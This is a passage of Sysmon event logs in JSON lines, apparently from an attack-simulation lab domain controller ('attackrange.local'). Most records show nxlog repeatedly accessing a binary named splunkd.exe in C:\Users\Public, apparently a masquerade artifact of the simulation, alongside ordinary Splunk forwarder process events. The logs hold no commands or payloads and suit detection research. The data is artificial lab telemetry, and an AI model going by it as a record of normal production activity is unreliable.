(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:18.222\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:18.222","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:19.225\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:19.225","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:20.228\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:20.228","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2820,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:21.231\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:21.231","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2821,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.234\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.234","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2822,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.705\r\nProcessGuid: {E2A3D6B1-10AE-5F25-0000-001041EA0400}\r\nProcessId: 3868\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.705","ProcessGuid":"{E2A3D6B1-10AE-5F25-0000-001041EA0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2823,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:22.704\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10AE-5F25-0000-001041EA0400}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:22.704","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10AE-5F25-0000-001041EA0400}","TargetProcessId":"3868","TargetImage":"C:\\Program 